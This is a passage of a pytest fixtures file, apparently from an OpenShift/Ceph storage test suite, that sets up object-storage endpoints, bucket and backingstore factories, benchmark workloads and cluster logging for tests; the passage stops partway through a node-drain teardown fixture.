def cld_mgr(request, rgw_endpoint):
"""
Returns a cloud manager instance that'll be used throughout the session
Returns:
CloudManager: A CloudManager resource
"""
cld_mgr = CloudManager()
def finalizer():
for client in vars(cld_mgr):
try:
getattr(cld_mgr, client).secret.delete()
except AttributeError:
log.info(f"{client} secret not found")
request.addfinalizer(finalizer)
return cld_mgr
@pytest.fixture()
def rgw_obj(request):
return rgw_obj_fixture(request)
@pytest.fixture(scope="session")
def rgw_obj_session(request):
return rgw_obj_fixture(request)
def rgw_obj_fixture(request):
"""
Returns an RGW resource that represents RGW in the cluster
Returns:
RGW: An RGW resource
"""
rgw_deployments = get_deployments_having_label(
label=constants.RGW_APP_LABEL, namespace=config.ENV_DATA["cluster_namespace"]
)
try:
storageclass = OCP(
kind=constants.STORAGECLASS,
namespace=config.ENV_DATA["cluster_namespace"],
resource_name=constants.DEFAULT_EXTERNAL_MODE_STORAGECLASS_RGW,
).get()
except CommandFailed:
storageclass = None
if rgw_deployments or storageclass:
return RGW()
else:
return None
@pytest.fixture()
def rgw_deployments(request):
"""
Return RGW deployments or skip the test.
"""
rgw_deployments = get_deployments_having_label(
label=constants.RGW_APP_LABEL, namespace=config.ENV_DATA["cluster_namespace"]
)
if rgw_deployments:
# Force-skipping in case of IBM Cloud -
# https://github.com/red-hat-storage/ocs-ci/issues/3863
if config.ENV_DATA["platform"].lower() == constants.IBMCLOUD_PLATFORM:
pytest.skip(
"RGW deployments were found, but test will be skipped because of BZ1926831"
)
return rgw_deployments
else:
pytest.skip("There is no RGW deployment available for this test.")
@pytest.fixture(scope="session")
def rgw_endpoint(request):
"""
Expose RGW service and return external RGW endpoint address if available.
Returns:
string: external RGW endpoint
"""
log.info("Looking for RGW service to expose")
oc = ocp.OCP(kind=constants.SERVICE, namespace=config.ENV_DATA["cluster_namespace"])
rgw_service = oc.get(selector=constants.RGW_APP_LABEL)["items"]
if rgw_service:
if config.DEPLOYMENT["external_mode"]:
rgw_service = constants.RGW_SERVICE_EXTERNAL_MODE
else:
rgw_service = constants.RGW_SERVICE_INTERNAL_MODE
log.info(f"Service {rgw_service} found and will be exposed")
# custom hostname is provided because default hostname from rgw service
# is too long and OCP rejects it
oc = ocp.OCP(
kind=constants.ROUTE, namespace=config.ENV_DATA["cluster_namespace"]
)
route = oc.get(resource_name="noobaa-mgmt")
router_hostname = route["status"]["ingress"][0]["routerCanonicalHostname"]
rgw_hostname = f"rgw.{router_hostname}"
try:
oc.exec_oc_cmd(f"expose service/{rgw_service} --hostname {rgw_hostname}")
except CommandFailed as cmdfailed:
if "AlreadyExists" in str(cmdfailed):
log.warning("RGW route already exists.")
# new route is named after service
rgw_endpoint = oc.get(resource_name=rgw_service)
endpoint_obj = OCS(**rgw_endpoint)
def _finalizer():
endpoint_obj.delete()
request.addfinalizer(_finalizer)
return f"http://{rgw_hostname}"
else:
log.info("RGW service is not available")
@pytest.fixture()
def mcg_obj(request):
return mcg_obj_fixture(request)
@pytest.fixture(scope="session")
def mcg_obj_session(request):
return mcg_obj_fixture(request)
def mcg_obj_fixture(request, *args, **kwargs):
"""
Returns an MCG resource that's connected to the S3 endpoint
Returns:
MCG: An MCG resource
"""
if config.ENV_DATA["platform"].lower() == constants.OPENSHIFT_DEDICATED_PLATFORM:
log.warning("As openshift dedicated is used, no MCG resource is returned")
return None
mcg_obj = MCG(*args, **kwargs)
def finalizer():
if config.ENV_DATA["platform"].lower() == "aws":
mcg_obj.cred_req_obj.delete()
if kwargs.get("create_aws_creds"):
request.addfinalizer(finalizer)
return mcg_obj
@pytest.fixture()
def awscli_pod(request):
return awscli_pod_fixture(request, scope_name="function")
@pytest.fixture(scope="session")
def awscli_pod_session(request):
return awscli_pod_fixture(request, scope_name="session")
def awscli_pod_fixture(request, scope_name):
"""
Creates a new AWSCLI pod for relaying commands
Args:
scope_name (str): The name of the fixture's scope,
used for giving a descriptive name to the pod and configmap
Returns:
pod: A pod running the AWS CLI
"""
# Create the service-ca configmap to be mounted upon pod creation
service_ca_data = templating.load_yaml(constants.AWSCLI_SERVICE_CA_YAML)
service_ca_configmap_name = create_unique_resource_name(
constants.AWSCLI_SERVICE_CA_CONFIGMAP_NAME, scope_name
)
service_ca_data["metadata"]["name"] = service_ca_configmap_name
log.info("Trying to create the AWS CLI service CA")
service_ca_configmap = helpers.create_resource(**service_ca_data)
arch = get_system_architecture()
if arch.startswith("x86"):
pod_dict_path = constants.AWSCLI_POD_YAML
else:
pod_dict_path = constants.AWSCLI_MULTIARCH_POD_YAML
awscli_pod_dict = templating.load_yaml(pod_dict_path)
awscli_pod_dict["spec"]["volumes"][0]["configMap"][
"name"
] = service_ca_configmap_name
awscli_pod_name = create_unique_resource_name(
constants.AWSCLI_RELAY_POD_NAME, scope_name
)
awscli_pod_dict["metadata"]["name"] = awscli_pod_name
update_container_with_mirrored_image(awscli_pod_dict)
awscli_pod_obj = Pod(**awscli_pod_dict)
assert awscli_pod_obj.create(
do_reload=True
), f"Failed to create Pod {awscli_pod_name}"
OCP(namespace=defaults.ROOK_CLUSTER_NAMESPACE, kind="ConfigMap").wait_for_resource(
resource_name=service_ca_configmap.name, column="DATA", condition="1"
)
helpers.wait_for_resource_state(awscli_pod_obj, constants.STATUS_RUNNING)
def _awscli_pod_cleanup():
awscli_pod_obj.delete()
service_ca_configmap.delete()
request.addfinalizer(_awscli_pod_cleanup)
return awscli_pod_obj
@pytest.fixture()
def test_directory_setup(request, awscli_pod_session):
return test_directory_setup_fixture(request, awscli_pod_session)
def test_directory_setup_fixture(request, awscli_pod_session):
origin_dir, result_dir = setup_pod_directories(
awscli_pod_session, ["origin", "result"]
)
SetupDirs = namedtuple("SetupDirs", "origin_dir, result_dir")
def dir_cleanup():
test_name = get_current_test_name()
awscli_pod_session.exec_cmd_on_pod(command=f"rm -rf {test_name}")
request.addfinalizer(dir_cleanup)
return SetupDirs(origin_dir=origin_dir, result_dir=result_dir)
@pytest.fixture()
def nodes():
"""
Return an instance of the relevant platform nodes class
(e.g. AWSNodes, VMWareNodes) to be later used in the test
for nodes related operations, like nodes restart,
detach/attach volume, etc.
"""
factory = platform_nodes.PlatformNodesFactory()
nodes = factory.get_nodes_platform()
return nodes
@pytest.fixture()
def uploaded_objects(request, mcg_obj, awscli_pod, verify_rgw_restart_count):
return uploaded_objects_fixture(
request, mcg_obj, awscli_pod, verify_rgw_restart_count
)
@pytest.fixture(scope="session")
def uploaded_objects_session(
request, mcg_obj_session, awscli_pod_session, verify_rgw_restart_count_session
):
return uploaded_objects_fixture(
request, mcg_obj_session, awscli_pod_session, verify_rgw_restart_count_session
)
def uploaded_objects_fixture(request, mcg_obj, awscli_pod, verify_rgw_restart_count):
"""
Keeps track of objects uploaded during the test and deletes them at teardown
Args:
mcg_obj (MCG): An MCG object containing the MCG S3 connection
credentials
awscli_pod (Pod): A pod running the AWSCLI tools
Returns:
list: An empty list of objects
"""
uploaded_objects_paths = []
def object_cleanup():
for uploaded_filename in uploaded_objects_paths:
log.info(f"Deleting object {uploaded_filename}")
awscli_pod.exec_cmd_on_pod(
command=craft_s3_command("rm " + uploaded_filename, mcg_obj),
secrets=[
mcg_obj.access_key_id,
mcg_obj.access_key,
mcg_obj.s3_internal_endpoint,
],
)
request.addfinalizer(object_cleanup)
return uploaded_objects_paths
@pytest.fixture()
def verify_rgw_restart_count(request):
return verify_rgw_restart_count_fixture(request)
@pytest.fixture(scope="session")
def verify_rgw_restart_count_session(request):
return verify_rgw_restart_count_fixture(request)
def verify_rgw_restart_count_fixture(request):
"""
Verifies the RGW restart count at start and end of a test
"""
if config.ENV_DATA["platform"].lower() in constants.ON_PREM_PLATFORMS:
log.info("Getting RGW pod restart count before executing the test")
initial_counts = get_rgw_restart_counts()
def finalizer():
rgw_pods = get_rgw_pods()
for rgw_pod in rgw_pods:
rgw_pod.reload()
log.info("Verifying whether RGW pods changed after executing the test")
for rgw_pod in rgw_pods:
assert rgw_pod.restart_count in initial_counts, "RGW pod restarted"
request.addfinalizer(finalizer)
@pytest.fixture()
def rgw_bucket_factory(request, rgw_obj):
if rgw_obj:
return bucket_factory_fixture(request, rgw_obj=rgw_obj)
else:
return None
@pytest.fixture(scope="session")
def rgw_bucket_factory_session(request, rgw_obj_session):
if rgw_obj_session:
return bucket_factory_fixture(request, rgw_obj=rgw_obj_session)
else:
return None
@pytest.fixture()
def bucket_factory(request, bucket_class_factory, mcg_obj):
"""
Returns an MCG bucket factory.
If MCG object not found returns None
"""
if mcg_obj:
return bucket_factory_fixture(request, bucket_class_factory, mcg_obj)
else:
return None
@pytest.fixture(scope="session")
def bucket_factory_session(request, bucket_class_factory_session, mcg_obj_session):
"""
Returns a session-scoped MCG bucket factory.
If session-scoped MCG object not found returns None
"""
if mcg_obj_session:
return bucket_factory_fixture(
request, bucket_class_factory_session, mcg_obj_session
)
else:
return None
def bucket_factory_fixture(
request, bucket_class_factory=None, mcg_obj=None, rgw_obj=None
):
"""
Create a bucket factory. Calling this fixture creates a new bucket(s).
For a custom amount, provide the 'amount' parameter.
***Please note***
Creation of buckets by utilizing the S3 interface *does not* support bucketclasses.
Only OC/CLI buckets can support different bucketclasses.
By default, all S3 buckets utilize the default bucketclass.
Args:
bucket_class_factory: creates a new Bucket Class
mcg_obj (MCG): An MCG object containing the MCG S3 connection
credentials
rgw_obj (RGW): An RGW object
"""
created_buckets = []
def _create_buckets(
amount=1,
interface="S3",
verify_health=True,
bucketclass=None,
replication_policy=None,
*args,
**kwargs,
):
"""
Creates the requested amount of buckets; all buckets created as part of
the test are deleted during teardown.
Args:
amount (int): The amount of buckets to create
interface (str): The interface to use for creation of buckets.
S3 | OC | CLI | NAMESPACE
verify_health (bool): Whether to verify the created bucket's health
post-creation
bucketclass (dict): A dictionary describing a new
bucketclass to be created.
When None, the default bucketclass is used.
Returns:
list: A list of s3.Bucket objects, containing all the created
buckets
"""
if bucketclass:
interface = bucketclass["interface"]
current_call_created_buckets = []
if interface.lower() not in BUCKET_MAP:
raise RuntimeError(
f"Invalid interface type received: {interface}. "
f'available types: {", ".join(BUCKET_MAP.keys())}'
)
bucketclass = (
bucketclass if bucketclass is None else bucket_class_factory(bucketclass)
)
for _ in range(amount):
bucket_name = helpers.create_unique_resource_name(
resource_description="bucket", resource_type=interface.lower()
)
created_bucket = BUCKET_MAP[interface.lower()](
bucket_name,
mcg=mcg_obj,
rgw=rgw_obj,
bucketclass=bucketclass,
replication_policy=replication_policy,
*args,
**kwargs,
)
current_call_created_buckets.append(created_bucket)
created_buckets.append(created_bucket)
if verify_health:
created_bucket.verify_health(**kwargs)
return current_call_created_buckets
def bucket_cleanup():
for bucket in created_buckets:
log.info(f"Cleaning up bucket {bucket.name}")
try:
bucket.delete()
except ClientError as e:
if e.response["Error"]["Code"] == "NoSuchBucket":
log.warning(f"{bucket.name} could not be found in cleanup")
else:
raise
request.addfinalizer(bucket_cleanup)
return _create_buckets
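# Illustrative usage sketch for the bucket factory above, creating two OC
# buckets backed by a custom bucketclass. The test name is hypothetical and
# the bucketclass dictionary is an example of the documented format (the same
# structure used by multiregion_mirror_setup_fixture below).
#
#   def test_bucket_example(bucket_factory):
#       bucketclass = {
#           "interface": "OC",
#           "backingstore_dict": {"aws": [(1, "us-west-1")]},
#       }
#       buckets = bucket_factory(amount=2, bucketclass=bucketclass)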
@pytest.fixture(scope="class")
def cloud_uls_factory(request, cld_mgr):
"""
Create an Underlying Storage factory.
Calling this fixture creates a new underlying storage(s).
Returns:
func: Factory method - each call to this function creates
an Underlying Storage factory
"""
return cloud_uls_factory_implementation(request, cld_mgr)
@pytest.fixture(scope="session")
def cloud_uls_factory_session(request, cld_mgr):
"""
Create an Underlying Storage factory.
Calling this fixture creates a new underlying storage(s).
Returns:
func: Factory method - each call to this function creates
an Underlying Storage factory
"""
return cloud_uls_factory_implementation(request, cld_mgr)
@pytest.fixture(scope="function")
def mcg_job_factory(request, bucket_factory, project_factory, mcg_obj, tmp_path):
"""
Create a Job factory.
Calling this fixture creates a new Job(s) that utilize MCG bucket.
Returns:
func: Factory method - each call to this function creates
a job
"""
return mcg_job_factory_implementation(
request, bucket_factory, project_factory, mcg_obj, tmp_path
)
@pytest.fixture(scope="session")
def mcg_job_factory_session(
request, bucket_factory_session, project_factory_session, mcg_obj_session, tmp_path
):
"""
Create a Job factory.
Calling this fixture creates a new Job(s) that utilize MCG bucket.
Returns:
func: Factory method - each call to this function creates
a job
"""
return mcg_job_factory_implementation(
request,
bucket_factory_session,
project_factory_session,
mcg_obj_session,
tmp_path,
)
@pytest.fixture()
def backingstore_factory(request, cld_mgr, mcg_obj, cloud_uls_factory):
"""
Create a Backing Store factory.
Calling this fixture creates a new Backing Store(s).
Returns:
func: Factory method - each call to this function creates
a backingstore
None: If MCG object not found
"""
if mcg_obj:
return backingstore_factory_implementation(
request, cld_mgr, mcg_obj, cloud_uls_factory
)
else:
return None
@pytest.fixture(scope="session")
def backingstore_factory_session(
request, cld_mgr, mcg_obj_session, cloud_uls_factory_session
):
"""
Create a Backing Store factory.
Calling this fixture creates a new Backing Store(s).
Returns:
func: Factory method - each call to this function creates
a backingstore
None: If session-scoped MCG object not found
"""
if mcg_obj_session:
return backingstore_factory_implementation(
request, cld_mgr, mcg_obj_session, cloud_uls_factory_session
)
else:
return None
@pytest.fixture()
def bucket_class_factory(
request, mcg_obj, backingstore_factory, namespace_store_factory
):
"""
Create a Bucket Class factory.
Calling this fixture creates a new Bucket Class.
Returns:
func: Factory method - each call to this function creates
a bucketclass
None: If MCG object not found
"""
if mcg_obj:
return bucketclass_factory_implementation(
request, mcg_obj, backingstore_factory, namespace_store_factory
)
else:
return None
@pytest.fixture(scope="session")
def bucket_class_factory_session(
request,
mcg_obj_session,
backingstore_factory_session,
namespace_store_factory_session,
):
"""
Create a Bucket Class factory.
Calling this fixture creates a new Bucket Class.
Returns:
func: Factory method - each call to this function creates
a bucketclass
None: If session-scoped MCG object not found
"""
if mcg_obj_session:
return bucketclass_factory_implementation(
request,
mcg_obj_session,
backingstore_factory_session,
namespace_store_factory_session,
)
else:
return None
@pytest.fixture()
def multiregion_mirror_setup(bucket_factory):
return multiregion_mirror_setup_fixture(bucket_factory)
@pytest.fixture(scope="session")
def multiregion_mirror_setup_session(bucket_factory_session):
return multiregion_mirror_setup_fixture(bucket_factory_session)
def multiregion_mirror_setup_fixture(bucket_factory):
# Setup
# Todo:
# add region and amount parametrization - note that `us-east-1`
# will cause an error as it is the default region. If usage of `us-east-1`
# needs to be tested, keep the 'region' field out.
bucketclass = {
"interface": "CLI",
"backingstore_dict": {"aws": [(1, "us-west-1"), (1, "us-east-2")]},
"placement_policy": "Mirror",
}
# Create a NooBucket that'll use the bucket class in order to test
# the mirroring policy
bucket = bucket_factory(1, "OC", bucketclass=bucketclass)[0]
return bucket, bucket.bucketclass.backingstores
@pytest.fixture(scope="session")
def default_storageclasses(request, teardown_factory_session):
"""
Returns dictionary with storageclasses. Keys represent reclaim policy of
storageclass. There are two storageclasses for each key. First is RBD based
and the second one is CephFS based. Storageclasses with Retain Reclaim
Policy are created from default storageclasses.
"""
scs = {constants.RECLAIM_POLICY_DELETE: [], constants.RECLAIM_POLICY_RETAIN: []}
# TODO(fbalak): Use proper constants after
# https://github.com/red-hat-storage/ocs-ci/issues/1056
# is resolved
for sc_name in ("ocs-storagecluster-ceph-rbd", "ocs-storagecluster-cephfs"):
sc = OCS(kind=constants.STORAGECLASS, metadata={"name": sc_name})
sc.reload()
scs[constants.RECLAIM_POLICY_DELETE].append(sc)
sc.data["reclaimPolicy"] = constants.RECLAIM_POLICY_RETAIN
sc.data["metadata"]["name"] += "-retain"
sc._name = sc.data["metadata"]["name"]
sc.create()
teardown_factory_session(sc)
scs[constants.RECLAIM_POLICY_RETAIN].append(sc)
return scs
@pytest.fixture(scope="class")
def install_logging(request):
"""
Setup and teardown
* The setup will deploy openshift-logging in the cluster
* The teardown will uninstall cluster-logging from the cluster
"""
def finalizer():
uninstall_cluster_logging()
request.addfinalizer(finalizer)
csv = ocp.OCP(
kind=constants.CLUSTER_SERVICE_VERSION,
namespace=constants.OPENSHIFT_LOGGING_NAMESPACE,
)
logging_csv = csv.get().get("items")
if logging_csv:
log.info("Logging is already configured, Skipping Installation")
return
log.info("Configuring Openshift-logging")
# Checks OCP version
ocp_version = get_running_ocp_version()
logging_channel = "stable" if ocp_version >= "4.7" else ocp_version
# Creates namespace openshift-operators-redhat
ocp_logging_obj.create_namespace(yaml_file=constants.EO_NAMESPACE_YAML)
# Creates an operator-group for elasticsearch
assert ocp_logging_obj.create_elasticsearch_operator_group(
yaml_file=constants.EO_OG_YAML, resource_name="openshift-operators-redhat"
)
# Set RBAC policy on the project
assert ocp_logging_obj.set_rbac(
yaml_file=constants.EO_RBAC_YAML, resource_name="prometheus-k8s"
)
# Creates subscription for elastic-search operator
subscription_yaml = templating.load_yaml(constants.EO_SUB_YAML)
subscription_yaml["spec"]["channel"] = logging_channel
helpers.create_resource(**subscription_yaml)
assert ocp_logging_obj.get_elasticsearch_subscription()
# Creates a namespace openshift-logging
ocp_logging_obj.create_namespace(yaml_file=constants.CL_NAMESPACE_YAML)
# Creates an operator-group for cluster-logging
assert ocp_logging_obj.create_clusterlogging_operator_group(
yaml_file=constants.CL_OG_YAML
)
# Creates subscription for cluster-logging
cl_subscription = templating.load_yaml(constants.CL_SUB_YAML)
cl_subscription["spec"]["channel"] = logging_channel
helpers.create_resource(**cl_subscription)
assert ocp_logging_obj.get_clusterlogging_subscription()
# Creates instance in namespace openshift-logging
cluster_logging_operator = OCP(
kind=constants.POD, namespace=constants.OPENSHIFT_LOGGING_NAMESPACE
)
log.info(f"The cluster-logging-operator {cluster_logging_operator.get()}")
ocp_logging_obj.create_instance()
@pytest.fixture
def fio_pvc_dict():
"""
PVC template for fio workloads.
Note that all 'None' values need to be defined before usage.
"""
return fio_artefacts.get_pvc_dict()
@pytest.fixture(scope="session")
def fio_pvc_dict_session():
"""
PVC template for fio workloads.
Note that all 'None' values need to be defined before usage.
"""
return fio_artefacts.get_pvc_dict()
@pytest.fixture
def fio_configmap_dict():
"""
ConfigMap template for fio workloads.
Note that you need to add actual configuration to workload.fio file.
"""
return fio_artefacts.get_configmap_dict()
@pytest.fixture(scope="session")
def fio_configmap_dict_session():
"""
ConfigMap template for fio workloads.
Note that you need to add actual configuration to workload.fio file.
"""
return fio_artefacts.get_configmap_dict()
@pytest.fixture
def fio_job_dict():
"""
Job template for fio workloads.
"""
return fio_artefacts.get_job_dict()
@pytest.fixture(scope="session")
def fio_job_dict_session():
"""
Job template for fio workloads.
"""
return fio_artefacts.get_job_dict()
@pytest.fixture(scope="function")
def pgsql_factory_fixture(request):
"""
Pgsql factory fixture
"""
pgsql = Postgresql()
def factory(
replicas,
clients=None,
threads=None,
transactions=None,
scaling_factor=None,
timeout=None,
sc_name=None,
):
"""
Factory to start pgsql workload
Args:
replicas (int): Number of pgbench pods to be deployed
clients (int): Number of clients
threads (int): Number of threads
transactions (int): Number of transactions
scaling_factor (int): scaling factor
timeout (int): Time in seconds to wait
"""
# Setup postgres
pgsql.setup_postgresql(replicas=replicas, sc_name=sc_name)
# Create pgbench benchmark
pgsql.create_pgbench_benchmark(
replicas=replicas,
clients=clients,
threads=threads,
transactions=transactions,
scaling_factor=scaling_factor,
timeout=timeout,
)
# Wait for pgbench pods to be initialized and complete
pgsql.wait_for_pgbench_status(status=constants.STATUS_COMPLETED)
# Get pgbench pods
pgbench_pods = pgsql.get_pgbench_pods()
# Validate pgbench run and parse logs
pgsql.validate_pgbench_run(pgbench_pods)
return pgsql
def finalizer():
"""
Clean up
"""
pgsql.cleanup()
request.addfinalizer(finalizer)
return factory
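# Illustrative usage sketch for the pgsql factory above. The test name and the
# workload sizing values are hypothetical.
#
#   def test_pgsql_example(pgsql_factory_fixture):
#       pgsql = pgsql_factory_fixture(
#           replicas=1, clients=4, transactions=600, timeout=900
#       )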
@pytest.fixture(scope="function")
def jenkins_factory_fixture(request):
"""
Jenkins factory fixture
"""
jenkins = Jenkins()
def factory(num_projects=1, num_of_builds=1):
"""
Factory to start jenkins workload
Args:
num_projects (int): Number of Jenkins projects
num_of_builds (int): Number of builds per project
"""
# Jenkins template
jenkins.create_ocs_jenkins_template()
# Init number of projects
jenkins.number_projects = num_projects
# Create app jenkins
jenkins.create_app_jenkins()
# Create jenkins pvc
jenkins.create_jenkins_pvc()
# Create jenkins build config
jenkins.create_jenkins_build_config()
# Wait for the jenkins deploy pod to reach the Completed state
jenkins.wait_for_jenkins_deploy_status(status=constants.STATUS_COMPLETED)
# Init number of builds per project
jenkins.number_builds_per_project = num_of_builds
# Start Builds
jenkins.start_build()
# Wait for the builds to reach 'Complete' state
jenkins.wait_for_build_to_complete()
# Print table of builds
jenkins.print_completed_builds_results()
return jenkins
def finalizer():
"""
Clean up
"""
jenkins.cleanup()
request.addfinalizer(finalizer)
return factory
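# Illustrative usage sketch for the jenkins factory above. The test name and
# values are hypothetical.
#
#   def test_jenkins_example(jenkins_factory_fixture):
#       jenkins = jenkins_factory_fixture(num_projects=2, num_of_builds=3)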
@pytest.fixture(scope="function")
def couchbase_new_factory_fixture(request):
"""
Couchbase factory fixture using Couchbase operator
"""
couchbase = CouchBase()
def factory(
replicas=3,
run_in_bg=False,
skip_analyze=True,
sc_name=None,
num_items=None,
num_threads=None,
):
"""
Factory to start couchbase workload
Args:
replicas (int): Number of couchbase workers to be deployed
run_in_bg (bool): Run IOs in background as option
skip_analyze (bool): Skip logs analysis as option
"""
# Create Couchbase subscription
couchbase.couchbase_subscription()
# Create Couchbase worker secrets
couchbase.create_cb_secrets()
# Create couchbase workers
couchbase.create_cb_cluster(replicas=replicas, sc_name=sc_name)
couchbase.create_data_buckets()
# Run couchbase workload
couchbase.run_workload(
replicas=replicas,
run_in_bg=run_in_bg,
num_items=num_items,
num_threads=num_threads,
)
# Run sanity check on data logs
couchbase.analyze_run(skip_analyze=skip_analyze)
return couchbase
def finalizer():
"""
Clean up
"""
couchbase.teardown()
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="function")
def amq_factory_fixture(request):
"""
AMQ factory fixture
"""
amq = AMQ()
def factory(
sc_name,
kafka_namespace=constants.AMQ_NAMESPACE,
size=100,
replicas=3,
topic_name="my-topic",
user_name="my-user",
partitions=1,
topic_replicas=1,
num_of_producer_pods=1,
num_of_consumer_pods=1,
value="10000",
since_time=1800,
):
"""
Factory to start amq workload
Args:
sc_name (str): Name of the storage class
kafka_namespace (str): Namespace where kafka cluster to be created
size (int): Size of the storage
replicas (int): Number of kafka and zookeeper pods to be created
topic_name (str): Name of the topic to be created
user_name (str): Name of the user to be created
partitions (int): Number of partitions of topic
topic_replicas (int): Number of replicas of topic
num_of_producer_pods (int): Number of producer pods to be created
num_of_consumer_pods (int): Number of consumer pods to be created
value (str): Number of messages to be sent and received
since_time (int): Time window in seconds used to validate the sent messages
"""
# Setup kafka cluster
amq.setup_amq_cluster(
sc_name=sc_name, namespace=kafka_namespace, size=size, replicas=replicas
)
# Run open messages
amq.create_messaging_on_amq(
topic_name=topic_name,
user_name=user_name,
partitions=partitions,
replicas=topic_replicas,
num_of_producer_pods=num_of_producer_pods,
num_of_consumer_pods=num_of_consumer_pods,
value=value,
)
# Wait for some time to generate msg
waiting_time = 60
log.info(f"Waiting for {waiting_time}sec to generate msg")
time.sleep(waiting_time)
# Check messages are sent and received
threads = amq.run_in_bg(
namespace=kafka_namespace, value=value, since_time=since_time
)
return amq, threads
def finalizer():
"""
Clean up
"""
# Clean up
amq.cleanup()
request.addfinalizer(finalizer)
return factory
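# Illustrative usage sketch for the AMQ factory above. The test name is
# hypothetical; the storage class name reuses the RBD storage class referenced
# elsewhere in this module.
#
#   def test_amq_example(amq_factory_fixture):
#       amq, threads = amq_factory_fixture(
#           sc_name="ocs-storagecluster-ceph-rbd", value="5000"
#       )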
@pytest.fixture
def measurement_dir(tmp_path):
"""
Returns the directory path where all measurement related results should
be stored. If 'measurement_dir' is provided by the config then it is
used, otherwise a new directory is generated.
Returns:
str: Path to measurement directory
"""
if config.ENV_DATA.get("measurement_dir"):
measurement_dir = config.ENV_DATA.get("measurement_dir")
log.info(f"Using measurement dir from configuration: {measurement_dir}")
else:
measurement_dir = os.path.join(os.path.dirname(tmp_path), "measurement_results")
if not os.path.exists(measurement_dir):
log.info(f"Measurement dir {measurement_dir} doesn't exist. Creating it.")
os.mkdir(measurement_dir)
return measurement_dir
@pytest.fixture()
def multi_dc_pod(multi_pvc_factory, dc_pod_factory, service_account_factory):
"""
Prepare multiple dc pods for the test
Returns:
list: Pod instances
"""
def factory(
num_of_pvcs=1,
pvc_size=100,
project=None,
access_mode="RWO",
pool_type="rbd",
timeout=60,
):
dict_modes = {
"RWO": "ReadWriteOnce",
"RWX": "ReadWriteMany",
"RWX-BLK": "ReadWriteMany-Block",
}
dict_types = {"rbd": "CephBlockPool", "cephfs": "CephFileSystem"}
if access_mode in "RWX-BLK" and pool_type in "rbd":
modes = dict_modes["RWX-BLK"]
create_rbd_block_rwx_pod = True
else:
modes = dict_modes[access_mode]
create_rbd_block_rwx_pod = False
pvc_objs = multi_pvc_factory(
interface=dict_types[pool_type],
access_modes=[modes],
size=pvc_size,
num_of_pvc=num_of_pvcs,
project=project,
timeout=timeout,
)
dc_pods = []
dc_pods_res = []
sa_obj = service_account_factory(project=project)
with ThreadPoolExecutor() as p:
for pvc_obj in pvc_objs:
if create_rbd_block_rwx_pod:
dc_pods_res.append(
p.submit(
dc_pod_factory,
interface=constants.CEPHBLOCKPOOL,
pvc=pvc_obj,
raw_block_pv=True,
sa_obj=sa_obj,
)
)
else:
dc_pods_res.append(
p.submit(
dc_pod_factory,
interface=dict_types[pool_type],
pvc=pvc_obj,
sa_obj=sa_obj,
)
)
for dc in dc_pods_res:
pod_obj = dc.result()
if create_rbd_block_rwx_pod:
log.info(
"#### setting attribute pod_type since "
f"create_rbd_block_rwx_pod = {create_rbd_block_rwx_pod}"
)
setattr(pod_obj, "pod_type", "rbd_block_rwx")
else:
setattr(pod_obj, "pod_type", "")
dc_pods.append(pod_obj)
with ThreadPoolExecutor() as p:
for dc in dc_pods:
p.submit(
helpers.wait_for_resource_state,
resource=dc,
state=constants.STATUS_RUNNING,
timeout=120,
)
return dc_pods
return factory
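# Illustrative usage sketch for the multi DC pod factory above. The test name
# is hypothetical; the argument values follow the factory signature.
#
#   def test_multi_dc_pod_example(project_factory, multi_dc_pod):
#       project = project_factory()
#       dc_pods = multi_dc_pod(
#           num_of_pvcs=2,
#           pvc_size=10,
#           project=project,
#           access_mode="RWX",
#           pool_type="cephfs",
#       )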
@pytest.fixture(scope="session")
def htpasswd_path(tmpdir_factory):
"""
Returns:
string: Path to HTPasswd file with additional usernames
"""
return str(tmpdir_factory.mktemp("idp_data").join("users.htpasswd"))
@pytest.fixture(scope="session")
def htpasswd_identity_provider(request):
"""
Creates HTPasswd Identity provider.
Returns:
object: OCS object representing OCP OAuth object with HTPasswd IdP
"""
users.create_htpasswd_idp()
cluster = OCS(kind=constants.OAUTH, metadata={"name": "cluster"})
cluster.reload()
def finalizer():
"""
Remove HTPasswd IdP
"""
# TODO(fbalak): remove HTPasswd identityProvider
# cluster.ocp.patch(
# resource_name='cluster',
# params=f'[{ "op": "remove", "path": "/spec/identityProviders" }]'
# )
# users.delete_htpasswd_secret()
request.addfinalizer(finalizer)
return cluster
@pytest.fixture(scope="function")
def user_factory(request, htpasswd_identity_provider, htpasswd_path):
return users.user_factory(request, htpasswd_path)
@pytest.fixture(scope="session")
def user_factory_session(request, htpasswd_identity_provider, htpasswd_path):
return users.user_factory(request, htpasswd_path)
@pytest.fixture(autouse=True)
def log_alerts(request):
"""
Log alerts at the beginning and end of each test case. At the end of test
case print a difference: what new alerts are in place after the test is
complete.
"""
teardown = config.RUN["cli_params"].get("teardown")
dev_mode = config.RUN["cli_params"].get("dev_mode")
if teardown:
return
elif dev_mode:
log.info("Skipping alert check for development mode")
return
alerts_before = []
prometheus = None
try:
prometheus = PrometheusAPI()
except Exception:
log.exception("There was a problem with connecting to Prometheus")
def _collect_alerts():
try:
alerts_response = prometheus.get(
"alerts", payload={"silenced": False, "inhibited": False}
)
if alerts_response.ok:
alerts = alerts_response.json().get("data").get("alerts")
log.debug(f"Found alerts: {alerts}")
return alerts
else:
log.warning(
f"There was a problem with collecting alerts for analysis: {alerts_response.text}"
)
return False
except Exception:
log.exception("There was a problem with collecting alerts for analysis")
return False
def _print_diff():
if alerts_before:
alerts_after = _collect_alerts()
if alerts_after:
alerts_new = [
alert for alert in alerts_after if alert not in alerts_before
]
if alerts_new:
log.warning("During test were raised new alerts")
log.warning(alerts_new)
alerts_before = _collect_alerts()
request.addfinalizer(_print_diff)
@pytest.fixture(scope="session", autouse=True)
def ceph_toolbox(request):
"""
    This fixture creates the ceph toolbox pod for manually created deployments,
    if it does not already exist.
"""
deploy = config.RUN["cli_params"]["deploy"]
teardown = config.RUN["cli_params"].get("teardown")
skip_ocs = config.ENV_DATA["skip_ocs_deployment"]
deploy_teardown = deploy or teardown
managed_platform = (
config.ENV_DATA["platform"].lower() == constants.OPENSHIFT_DEDICATED_PLATFORM
or config.ENV_DATA["platform"].lower() == constants.ROSA_PLATFORM
)
if not (deploy_teardown or skip_ocs) or (managed_platform and not deploy_teardown):
try:
# Creating toolbox pod
setup_ceph_toolbox()
except CommandFailed:
log.info("Failed to create toolbox")
@pytest.fixture(scope="function")
def node_drain_teardown(request):
"""
Tear down function after Node drain
"""
def finalizer():
"""
Make sure that all cluster's nodes are in 'Ready' state and if not,
change them back to 'Ready' state by marking them as schedulable
"""
scheduling_disabled_nodes = [
n.name
for n in get_node_objs()
if n.ocp.get_resource_status(n.name)
